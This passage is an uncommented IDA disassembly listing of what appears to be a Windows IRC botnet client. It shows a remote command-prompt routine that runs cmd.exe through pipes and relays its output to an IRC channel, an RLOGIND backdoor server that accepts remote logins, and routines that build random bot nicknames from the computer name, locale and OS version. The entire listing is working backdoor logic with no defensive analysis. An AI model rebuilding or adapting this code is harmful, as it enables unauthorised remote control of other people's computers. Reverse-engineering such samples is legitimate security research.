loc_40DB51: ; CODE XREF: sub_40DB3D+F�j
mov eax, dword_479BC8
cmp eax, 0FFFFFFFFh
jz short loc_40DB5E
push eax
call esi ; CloseHandle
loc_40DB5E: ; CODE XREF: sub_40DB3D+1C�j
mov eax, dword_479C04
cmp eax, 0FFFFFFFFh
jz short loc_40DB6B
push eax
call esi ; CloseHandle
loc_40DB6B: ; CODE XREF: sub_40DB3D+29�j
pop esi
retn
sub_40DB3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DB6D proc near ; CODE XREF: sub_4078FA+34AE�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea edx, [eax+1]
loc_40DB77: ; CODE XREF: sub_40DB6D+F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40DB77
push 0
lea ecx, [ebp+var_4]
push ecx
sub eax, edx
push eax
push [ebp+arg_0]
mov [ebp+var_4], eax
push dword_479BC0
call ds:dword_41F038 ; WriteFile
test eax, eax
jnz short loc_40DBA6
call sub_40DB3D
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40DBA6: ; CODE XREF: sub_40DB6D+2E�j
xor eax, eax
inc eax
leave
retn
sub_40DB6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DBAB proc near ; CODE XREF: sub_40DC39+D9�p
; sub_40DC39+11F�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
mov esi, [ebp+arg_4]
xor ecx, ecx
push edi
inc ecx
mov edi, 41FA76h
xor eax, eax
repe cmpsb
pop edi
pop esi
jz short loc_40DBF0
push 0FAh
call ds:dword_41F000 ; Sleep
push [ebp+arg_8]
lea eax, [ebp+var_200]
push [ebp+arg_4]
push offset aPrivmsgSS ; "PRIVMSG %s :%s\r"
push eax
call sub_412BB5
add esp, 10h
jmp short loc_40DC07
; ---------------------------------------------------------------------------
loc_40DBF0: ; CODE XREF: sub_40DBAB+1C�j
push [ebp+arg_8]
lea eax, [ebp+var_200]
push offset aS_1 ; "%s"
push eax
call sub_412BB5
add esp, 0Ch
loc_40DC07: ; CODE XREF: sub_40DBAB+43�j
lea eax, [ebp+var_200]
lea edx, [eax+1]
loc_40DC10: ; CODE XREF: sub_40DBAB+6A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40DC10
push 0
sub eax, edx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_433534
test eax, eax
jg short loc_40DC35
call sub_40DB3D
loc_40DC35: ; CODE XREF: sub_40DBAB+83�j
xor eax, eax
leave
retn
sub_40DBAB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DC39 proc near ; DATA XREF: sub_40DDC6+16A�o
var_20C = byte ptr -20Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
xor eax, eax
mov ebx, 80h
mov ecx, ebx
lea edi, [ebp+var_20C]
rep stosd
xor edi, edi
push edi
push edi
lea eax, [ebp+var_4]
push eax
mov esi, 200h
push esi
lea eax, [ebp+var_20C]
push eax
push dword_479BCC
call ds:dword_41F0E4 ; PeekNamedPipe
test eax, eax
jz loc_40DD48
jmp short loc_40DC83
; ---------------------------------------------------------------------------
loc_40DC81: ; CODE XREF: sub_40DC39+109�j
xor edi, edi
loc_40DC83: ; CODE XREF: sub_40DC39+46�j
cmp [ebp+var_4], edi
jnz short loc_40DCB3
lea eax, [ebp+var_8]
push eax
push dword_479C04
call ds:dword_41F0E0 ; GetExitCodeProcess
test eax, eax
jz short loc_40DCA9
cmp [ebp+var_8], 103h
jnz loc_40DD75
loc_40DCA9: ; CODE XREF: sub_40DC39+61�j
push 0Ah
call ds:dword_41F000 ; Sleep
jmp short loc_40DD1A
; ---------------------------------------------------------------------------
loc_40DCB3: ; CODE XREF: sub_40DC39+4D�j
xor eax, eax
cmp [ebp+var_4], edi
jbe short loc_40DCCE
loc_40DCBA: ; CODE XREF: sub_40DC39+93�j
cmp [ebp+eax+var_20C], 0Ah
jz loc_40DD6C
inc eax
cmp eax, [ebp+var_4]
jb short loc_40DCBA
loc_40DCCE: ; CODE XREF: sub_40DC39+7F�j
mov [ebp+var_4], esi
loc_40DCD1: ; CODE XREF: sub_40DC39+137�j
xor eax, eax
push eax
mov ecx, ebx
lea edi, [ebp+var_20C]
rep stosd
lea eax, [ebp+var_C]
push eax
push [ebp+var_4]
lea eax, [ebp+var_20C]
push eax
push dword_479BCC
call ds:dword_41F058 ; ReadFile
test eax, eax
jz loc_40DD9D
lea eax, [ebp+var_20C]
push eax
push offset dword_479BD0
push dword_479BC4
call sub_40DBAB
add esp, 0Ch
loc_40DD1A: ; CODE XREF: sub_40DC39+78�j
xor eax, eax
push eax
push eax
mov ecx, ebx
lea edi, [ebp+var_20C]
rep stosd
lea eax, [ebp+var_4]
push eax
push esi
lea eax, [ebp+var_20C]
push eax
push dword_479BCC
call ds:dword_41F0E4 ; PeekNamedPipe
test eax, eax
jnz loc_40DC81
loc_40DD48: ; CODE XREF: sub_40DC39+40�j
push offset aCmdCouldNotRea ; "[CMD]: Could not read data from procces"...
push offset dword_479BD0
push dword_479BC4
call sub_40DBAB
push [ebp+arg_0]
call sub_4111AE
add esp, 10h
push 1
jmp short loc_40DDBF
; ---------------------------------------------------------------------------
loc_40DD6C: ; CODE XREF: sub_40DC39+89�j
inc eax
mov [ebp+var_4], eax
jmp loc_40DCD1
; ---------------------------------------------------------------------------
loc_40DD75: ; CODE XREF: sub_40DC39+6A�j
call sub_40DB3D
push offset aCmdProccessHas ; "[CMD]: Proccess has terminated.\r\n"
push offset dword_479BD0
push dword_479BC4
call sub_40DBAB
push [ebp+arg_0]
call sub_4111AE
add esp, 10h
push edi
jmp short loc_40DDBF
; ---------------------------------------------------------------------------
loc_40DD9D: ; CODE XREF: sub_40DC39+C1�j
push offset aCmdCouldNotR_0 ; "[CMD]: Could not read data from procces"...
push offset dword_479BD0
push dword_479BC4
call sub_40DBAB
push [ebp+arg_0]
call sub_4111AE
add esp, 10h
push 0
loc_40DDBF: ; CODE XREF: sub_40DC39+131�j
; sub_40DC39+162�j
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_40DC39 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DDC6 proc near ; CODE XREF: sub_4078FA+421C�p
var_378 = byte ptr -378h
var_178 = byte ptr -178h
var_74 = dword ptr -74h
var_48 = dword ptr -48h
var_44 = word ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 378h
push esi
call sub_40DB3D
xor esi, esi
push esi
lea eax, [ebp+var_178]
push eax
push 104h
push esi
push offset aCmd_exe ; "cmd.exe"
push esi
call dword_4334C0
test eax, eax
jnz short loc_40DDFD
or eax, 0FFFFFFFFh
jmp loc_40DF72
; ---------------------------------------------------------------------------
loc_40DDFD: ; CODE XREF: sub_40DDC6+2D�j
push ebx
push edi
mov edi, ds:dword_41F0EC
push esi
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_C]
push eax
xor ebx, ebx
lea eax, [ebp+var_10]
inc ebx
push eax
mov [ebp+var_1C], 0Ch
mov [ebp+var_14], ebx
mov [ebp+var_18], esi
call edi ; CreatePipe
test eax, eax
jnz short loc_40DE30
loc_40DE28: ; CODE XREF: sub_40DDC6+7B�j
; sub_40DDC6+9D�j ...
or eax, 0FFFFFFFFh
jmp loc_40DF70
; ---------------------------------------------------------------------------
loc_40DE30: ; CODE XREF: sub_40DDC6+60�j
push esi
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
call edi ; CreatePipe
test eax, eax
jz short loc_40DE28
mov edi, ds:dword_41F0B4
push 3
push esi
push esi
push offset dword_479BC0
call edi ; GetCurrentProcess
push eax
push [ebp+var_8]
call edi ; GetCurrentProcess
push eax
call ds:dword_41F0E8 ; DuplicateHandle
test eax, eax
jz short loc_40DE28
xor eax, eax
lea edi, [ebp+var_2C]
stosd
stosd
stosd
push 11h
pop ecx
stosd
xor eax, eax
lea edi, [ebp+var_74]
rep stosd
mov eax, [ebp+var_4]
mov [ebp+var_3C], eax
mov eax, [ebp+var_C]
mov [ebp+var_38], eax
mov [ebp+var_34], eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_74]
push eax
push esi
push esi
push esi
push ebx
push esi
push esi
mov ebx, 41FA76h
push ebx
lea eax, [ebp+var_178]
push eax
mov [ebp+var_74], 44h
mov [ebp+var_48], 101h
mov [ebp+var_44], si
call ds:dword_41F030 ; CreateProcessA
test eax, eax
jz loc_40DE28
push [ebp+var_4]
mov edi, ds:dword_41F034
call edi ; CloseHandle
mov eax, [ebp+var_10]
push [ebp+var_28]
mov dword_479BCC, eax
mov eax, [ebp+var_8]
mov dword_479BC8, eax
mov eax, [ebp+var_2C]
mov dword_479C04, eax
call edi ; CloseHandle
cmp [ebp+arg_4], esi
mov eax, [ebp+arg_0]
mov dword_479BC4, eax
jz short loc_40DEFC
push [ebp+arg_4]
jmp short loc_40DEFD
; ---------------------------------------------------------------------------
loc_40DEFC: ; CODE XREF: sub_40DDC6+12F�j
push ebx
loc_40DEFD: ; CODE XREF: sub_40DDC6+134�j
push offset dword_479BD0
call sub_412BB5
pop ecx
pop ecx
push esi
push 8
push offset aCmdRemoteComma ; "[CMD]: Remote Command Prompt"
call sub_410EEA
mov ecx, [ebp+var_24]
mov edi, eax
imul edi, 234h
add esp, 0Ch
mov dword_434340[edi], ecx
lea ecx, [ebp+var_30]
push ecx
push esi
push eax
push offset sub_40DC39
push esi
push esi
call ds:dword_41F00C ; CreateThread
cmp eax, esi
mov dword_43434C[edi], eax
jnz short loc_40DF6E
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_378]
push offset aCmdFailedToSta ; "[CMD]: Failed to start IO thread, error"...
push eax
call sub_412BB5
lea eax, [ebp+var_378]
push eax
call sub_401C33
add esp, 10h
loc_40DF6E: ; CODE XREF: sub_40DDC6+17F�j
xor eax, eax
loc_40DF70: ; CODE XREF: sub_40DDC6+65�j
pop edi
pop ebx
loc_40DF72: ; CODE XREF: sub_40DDC6+32�j
pop esi
leave
retn
sub_40DDC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DF75 proc near ; CODE XREF: sub_40E00D+A6�p
; sub_40E00D+B6�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
mov esi, eax
loc_40DF7C: ; CODE XREF: sub_40DF75+2A�j
push 0
push 1
lea eax, [ebp+var_1]
push eax
push [ebp+arg_0]
call dword_433414
cmp eax, 1
jnz short loc_40DFB2
mov al, [ebp+var_1]
mov [esi], al
inc esi
dec [ebp+arg_4]
jz short loc_40DFA7
test al, al
jnz short loc_40DF7C
xor eax, eax
inc eax
loc_40DFA4: ; CODE XREF: sub_40DF75+3F�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_40DFA7: ; CODE XREF: sub_40DF75+26�j
push offset aRlogindProtoco ; "[RLOGIND]: Protocol string too long."
call sub_401CA7
pop ecx
loc_40DFB2: ; CODE XREF: sub_40DF75+1B�j
xor eax, eax
jmp short loc_40DFA4
sub_40DF75 endp
; =============== S U B R O U T I N E =======================================
sub_40DFB6 proc near ; DATA XREF: sub_40E219+5A�o
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
setz al
retn
sub_40DFB6 endp
; =============== S U B R O U T I N E =======================================
sub_40DFC0 proc near ; CODE XREF: sub_40E00D+175�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_40DFC5: ; CODE XREF: sub_40DFC0+21�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_40DFE7
test cl, cl
jz short loc_40DFE3
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_40DFE7
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40DFC5
loc_40DFE3: ; CODE XREF: sub_40DFC0+F�j
xor eax, eax
jmp short loc_40DFEC
; ---------------------------------------------------------------------------
loc_40DFE7: ; CODE XREF: sub_40DFC0+B�j
; sub_40DFC0+19�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40DFEC: ; CODE XREF: sub_40DFC0+25�j
test eax, eax
pop esi
jz short loc_40E009
push [esp+arg_4]
push [esp+4+arg_0]
push offset aRlogindLoginRe ; "[RLOGIND]: Login rejected, Remote user:"...
call sub_401CA7
add esp, 0Ch
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40E009: ; CODE XREF: sub_40DFC0+2F�j
xor eax, eax
inc eax
retn
sub_40DFC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40E00D proc near ; DATA XREF: sub_40E219+19F�o
var_3D4 = byte ptr -3D4h
var_350 = byte ptr -350h
var_208 = dword ptr -208h
var_1F4 = dword ptr -1F4h
var_1F0 = dword ptr -1F0h
var_F0 = byte ptr -0F0h
var_B0 = byte ptr -0B0h
var_4C = byte ptr -4Ch
var_3C = byte ptr -3Ch
var_2C = byte ptr -2Ch
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 3D4h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_3D4]
rep movsd
mov esi, [ebp+74h+var_208]
mov [ebp+74h+arg_0], esi
imul esi, 234h
xor edi, edi
inc edi
mov [eax+1DCh], edi
mov eax, dword_434344[esi]
mov [ebp+74h+var_1F0], eax
xor ebx, ebx
lea eax, [ebp+74h+var_C]
push eax
push ebx
push ebx
lea eax, [ebp+74h+var_1F4]
push eax
push ebx
mov [ebp+74h+var_C], 1Eh
mov [ebp+74h+var_8], ebx
mov [ebp+74h+var_1F4], edi
call dword_433544
test eax, eax
jnz short loc_40E096
push dword_434344[esi]
call dword_4335AC
push [ebp+74h+var_208]
loc_40E08B: ; CODE XREF: sub_40E00D+1A2�j
call sub_4111AE
pop ecx
jmp loc_40E211
; ---------------------------------------------------------------------------
loc_40E096: ; CODE XREF: sub_40E00D+6A�j
push ebx
push edi
lea eax, [ebp+74h+var_3C]
push eax
push dword_434344[esi]
call dword_433414
push 10h
push dword_434344[esi]
lea eax, [ebp+74h+var_2C]
call sub_40DF75
push 10h
push dword_434344[esi]
lea eax, [ebp+74h+var_4C]
call sub_40DF75
push 40h
push dword_434344[esi]
lea eax, [ebp+74h+var_F0]
call sub_40DF75
add esp, 18h
lea eax, [ebp+74h+var_4]
push eax
lea eax, [ebp+74h+var_1C]
push eax
push dword_434344[esi]
mov [ebp+74h+var_4], 10h
call dword_4334E0
test eax, eax
jz short loc_40E11E
call dword_433558
push eax
push offset aRlogindErrorGe ; "[RLOGIND]: Error: getpeername(): <%d>."
call sub_401CA7
push [ebp+74h+var_208]
call sub_4111AE
add esp, 0Ch
jmp loc_40E211
; ---------------------------------------------------------------------------
loc_40E11E: ; CODE XREF: sub_40E00D+EB�j
push 2
push 4
lea eax, [ebp+74h+var_18]
push eax
call dword_433590
cmp eax, ebx
jnz short loc_40E147
push [ebp+74h+var_18]
call dword_433520
push eax
lea eax, [ebp+74h+var_B0]
push eax
call sub_412BB5
pop ecx
pop ecx
jmp short loc_40E156
; ---------------------------------------------------------------------------
loc_40E147: ; CODE XREF: sub_40E00D+121�j
mov ecx, [eax]
lea edx, [ebp+74h+var_B0]
loc_40E14C: ; CODE XREF: sub_40E00D+147�j
mov al, [ecx]
inc ecx
mov [edx], al
inc edx
cmp al, bl
jnz short loc_40E14C
loc_40E156: ; CODE XREF: sub_40E00D+138�j
push ebx
push edi
push 41FA76h
push dword_434344[esi]
call dword_433534
cmp dword_479C0C, ebx
jnz short loc_40E1B4
push [ebp+74h+var_18]
lea eax, [ebp+74h+var_B0]
push eax
lea eax, [ebp+74h+var_2C]
push eax
lea eax, [ebp+74h+var_350]
call sub_40DFC0
add esp, 0Ch
test eax, eax
jnz short loc_40E1B4
push ebx
push 13h
push offset aPermissionDeni ; "Permission denied\n"
lea esi, dword_434344[esi]
push dword ptr [esi]
call dword_433534
push dword ptr [esi]
call dword_4335AC
push [ebp+74h+arg_0]
jmp loc_40E08B
; ---------------------------------------------------------------------------
loc_40E1B4: ; CODE XREF: sub_40E00D+162�j
; sub_40E00D+17F�j
lea eax, [ebp+74h+var_B0]
push eax
lea eax, [ebp+74h+var_2C]
push eax
push offset aRlogindUserLog ; "[RLOGIND]: User logged in: <%s@%s>."
call sub_401CA7
push [ebp+74h+arg_0]
call sub_40F3F5
add esp, 10h
test eax, eax
jnz short loc_40E1F4
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aRlogindErrorSe ; "[RLOGIND]: Error: SessionRun(): <%d>."
call sub_401CA7
push [ebp+74h+arg_0]
call sub_4111AE
add esp, 0Ch
push edi
jmp short loc_40E212
; ---------------------------------------------------------------------------
loc_40E1F4: ; CODE XREF: sub_40E00D+1C6�j
lea eax, [ebp+74h+var_B0]
push eax
lea eax, [ebp+74h+var_2C]
push eax
push offset aRlogindUserL_0 ; "[RLOGIND]: User logged out: <%s@%s>."
call sub_401CA7
push [ebp+74h+arg_0]
call sub_4111AE
add esp, 10h
loc_40E211: ; CODE XREF: sub_40E00D+84�j
; sub_40E00D+10C�j
push ebx
loc_40E212: ; CODE XREF: sub_40E00D+1E5�j
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_40E00D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E219 proc near ; DATA XREF: sub_4078FA+40DB�o
var_5A8 = byte ptr -5A8h
var_418 = byte ptr -418h
var_218 = dword ptr -218h
var_214 = byte ptr -214h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5A8h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+var_218]
rep movsd
xor esi, esi
inc esi
mov [eax+1DCh], esi
lea eax, [ebp+var_5A8]
push eax
push 202h
call dword_4334B0
xor ebx, ebx
cmp eax, ebx
jz short loc_40E272
push eax
push offset aRlogindErrorWs ; "[RLOGIND]: Error: WSAStartup(): <%d>."
call sub_401CA7
push [ebp+var_50]
call sub_4111AE
add esp, 0Ch
loc_40E26C: ; CODE XREF: sub_40E219+8B�j
push esi
jmp loc_40E48E
; ---------------------------------------------------------------------------
loc_40E272: ; CODE XREF: sub_40E219+3B�j
push esi
push offset sub_40DFB6
call ds:dword_41F0F0 ; SetConsoleCtrlHandler
test eax, eax
jnz short loc_40E2A6
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_0 ; "[RLOGIND]: Failed to install control-C "...
call sub_401CA7
pop ecx
pop ecx
call dword_4335B8
push [ebp+var_50]
call sub_4111AE
pop ecx
jmp short loc_40E26C
; ---------------------------------------------------------------------------
loc_40E2A6: ; CODE XREF: sub_40E219+67�j
push [ebp+var_54]
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
mov [ebp+var_24], 2
call dword_4335EC
push 6
push esi
push 2
mov [ebp+var_22], ax
mov [ebp+var_20], ebx
call dword_4334A0
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_40E41E
mov ecx, [ebp+var_50]
imul ecx, 234h
push 10h
pop edi
mov dword_434344[ecx], eax
push edi
lea ecx, [ebp+var_24]
push ecx
push eax
call dword_433578
test eax, eax
jnz loc_40E41E
push 7FFFFFFFh
push [ebp+arg_0]
call dword_4335C0
test eax, eax
jnz loc_40E41E
push offset aRlogindReadyAn ; "[RLOGIND]: Ready and waiting for incomi"...
mov [ebp+var_14], 0Ch
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
call sub_401C33
pop ecx
mov [ebp+var_8], esi
jmp loc_40E3FD
; ---------------------------------------------------------------------------
loc_40E338: ; CODE XREF: sub_40E219+1FD�j
push [ebp+var_8]
lea eax, [ebp+var_8]
push eax
push 8
push 0FFFFh
push esi
call dword_4334BC
cmp eax, 0FFFFFFFFh
jz loc_40E3FD
push [ebp+var_50]
movzx eax, [ebp+var_32]
push eax
push [ebp+var_30]
mov [ebp+var_3C], ebx
call dword_433520
push eax
lea eax, [ebp+var_418]
push offset aRlogindClientC ; "[RLOGIND]: Client connection from IP: %"...
push eax
call sub_412BB5
lea eax, [ebp+var_418]
push eax
call sub_401C33
push esi
lea eax, [ebp+var_418]
push 7
push eax
call sub_410EEA
mov ecx, [ebp+var_50]
mov [ebp+var_4C], eax
imul eax, 234h
add esp, 24h
mov dword_43433C[eax], ecx
lea eax, [ebp+var_38]
push eax
push ebx
lea eax, [ebp+var_218]
push eax
push offset sub_40E00D
push ebx
lea eax, [ebp+var_14]
push eax
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_4C]
imul ecx, 234h
cmp eax, ebx
mov dword_43434C[ecx], eax
jnz short loc_40E3F8
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_1 ; "[RLOGIND]: Failed to start client threa"...
call sub_401CA7
pop ecx
pop ecx
jmp short loc_40E421
; ---------------------------------------------------------------------------
loc_40E3F0: ; CODE XREF: sub_40E219+1E2�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40E3F8: ; CODE XREF: sub_40E219+1C0�j
cmp [ebp+var_3C], ebx
jz short loc_40E3F0
loc_40E3FD: ; CODE XREF: sub_40E219+11A�j
; sub_40E219+137�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_34]
push eax
push [ebp+arg_0]
mov [ebp+var_4], edi
call dword_433464
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz loc_40E338
jmp short loc_40E421
; ---------------------------------------------------------------------------
loc_40E41E: ; CODE XREF: sub_40E219+BD�j
; sub_40E219+E3�j ...
mov esi, [ebp+arg_0]
loc_40E421: ; CODE XREF: sub_40E219+1D5�j
; sub_40E219+203�j
call dword_433558
push eax
lea eax, [ebp+var_418]
push offset aRlogindError_0 ; "[RLOGIND]: Error: server failed, return"...
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_40], ebx
jnz short loc_40E461
push ebx
push [ebp+var_44]
lea eax, [ebp+var_418]
push eax
lea eax, [ebp+var_214]
push eax
push [ebp+var_218]
call sub_4045DD
add esp, 14h
loc_40E461: ; CODE XREF: sub_40E219+226�j
lea eax, [ebp+var_418]
push eax
call sub_401C33
pop ecx
push esi
call dword_4335AC
push [ebp+arg_0]
call dword_4335AC
call dword_4335B8
push [ebp+var_50]
call sub_4111AE
pop ecx
push ebx
loc_40E48E: ; CODE XREF: sub_40E219+54�j
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_40E219 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40E495 proc near ; CODE XREF: sub_40E7B0+6C�p
; DATA XREF: .data:off_42B298�o
var_C = dword ptr -0Ch
arg_0 = dword ptr 4
push esi
push edi
call ds:dword_41F004 ; GetTickCount
push eax
call sub_412D64
mov edi, [esp+0Ch+arg_0]
mov [esp+0Ch+var_C], offset aSoul ; "[SOUL]"
push offset aS_1 ; "%s"
push 1Ch
push edi
call sub_412E0D
xor esi, esi
add esp, 10h
cmp dword_42AE60, esi
jle short loc_40E4EE
loc_40E4C8: ; CODE XREF: sub_40E495+57�j
call sub_412D71
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_412E0D
add esp, 14h
inc esi
cmp esi, dword_42AE60
jl short loc_40E4C8
loc_40E4EE: ; CODE XREF: sub_40E495+31�j
mov eax, edi
pop edi
pop esi
retn
sub_40E495 endp
; =============== S U B R O U T I N E =======================================
sub_40E4F3 proc near ; CODE XREF: sub_4078FA+2C3B�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
call ds:dword_41F004 ; GetTickCount
push eax
call sub_412D64
pop ecx
call sub_412D71
push 3
cdq
pop ecx
idiv ecx
mov ebx, [esp+0Ch+arg_0]
xor edi, edi
mov esi, edx
add esi, dword_42AE60
test esi, esi
jle short loc_40E536
loc_40E520: ; CODE XREF: sub_40E4F3+41�j
call sub_412D71
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_40E520
loc_40E536: ; CODE XREF: sub_40E4F3+2B�j
and byte ptr [edi+ebx], 0
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_40E4F3 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov dword ptr [ebp-4], 100h
call ds:dword_41F004 ; GetTickCount
push eax
call sub_412D64
pop ecx
lea eax, [ebp-4]
push eax
mov esi, offset aPc ; "PC"
push esi
call ds:dword_41F0B0 ; GetComputerNameA
mov edi, [ebp+8]
push esi
push 1Ch
push edi
call sub_412E0D
xor esi, esi
add esp, 0Ch
cmp dword_42AE60, esi
jle short loc_40E5A9
loc_40E583: ; CODE XREF: .text:0040E5A7�j
call sub_412D71
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_412E0D
add esp, 14h
inc esi
cmp esi, dword_42AE60
jl short loc_40E583
loc_40E5A9: ; CODE XREF: .text:0040E581�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
call ds:dword_41F004 ; GetTickCount
push eax
call sub_412D64
pop ecx
push 0Ah
lea eax, [ebp-0Ch]
push eax
push 7
push 800h
call ds:dword_41F0F4 ; GetLocaleInfoA
mov edi, [ebp+8]
lea eax, [ebp-0Ch]
push eax
push offset aS_1 ; "%s"
push 1Ch
push edi
call sub_412E0D
xor esi, esi
add esp, 10h
cmp dword_42AE60, esi
jle short loc_40E61E
loc_40E5F8: ; CODE XREF: .text:0040E61C�j
call sub_412D71
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_412E0D
add esp, 14h
inc esi
cmp esi, dword_42AE60
jl short loc_40E5F8
loc_40E61E: ; CODE XREF: .text:0040E5F6�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
lea ebp, [esp-74h]
sub esp, 94h
push esi
push edi
lea eax, [ebp-20h]
push eax
mov esi, 41FA76h
mov dword ptr [ebp-20h], 94h
call ds:dword_41F0F8 ; GetVersionExA
call ds:dword_41F004 ; GetTickCount
push eax
call sub_412D64
cmp dword ptr [ebp-1Ch], 4
pop ecx
jnz short loc_40E692
cmp dword ptr [ebp-18h], 0
jnz short loc_40E678
cmp dword ptr [ebp-10h], 1
jnz short loc_40E66B
mov esi, offset a95 ; "95"
loc_40E66B: ; CODE XREF: .text:0040E664�j
cmp dword ptr [ebp-10h], 2
jnz short loc_40E6C2
mov esi, offset aNt ; "NT"
jmp short loc_40E6C2
; ---------------------------------------------------------------------------
loc_40E678: ; CODE XREF: .text:0040E65E�j
cmp dword ptr [ebp-18h], 0Ah
jnz short loc_40E685
mov esi, offset a98 ; "98"
jmp short loc_40E6C2
; ---------------------------------------------------------------------------
loc_40E685: ; CODE XREF: .text:0040E67C�j
cmp dword ptr [ebp-18h], 5Ah
jnz short loc_40E6BD
mov esi, offset aMe_0 ; "ME"
jmp short loc_40E6C2
; ---------------------------------------------------------------------------
loc_40E692: ; CODE XREF: .text:0040E658�j
cmp dword ptr [ebp-1Ch], 5
jnz short loc_40E6BD
cmp dword ptr [ebp-18h], 0
jnz short loc_40E6A5
mov esi, offset a2k ; "2K"
jmp short loc_40E6C2
; ---------------------------------------------------------------------------
loc_40E6A5: ; CODE XREF: .text:0040E69C�j
cmp dword ptr [ebp-18h], 1
jnz short loc_40E6B2
mov esi, offset aXp_0 ; "XP"
jmp short loc_40E6C2
; ---------------------------------------------------------------------------
loc_40E6B2: ; CODE XREF: .text:0040E6A9�j
cmp dword ptr [ebp-18h], 2
mov esi, offset a2k3 ; "2K3"
jz short loc_40E6C2
loc_40E6BD: ; CODE XREF: .text:0040E689�j
; .text:0040E696�j
mov esi, offset a??? ; "???"
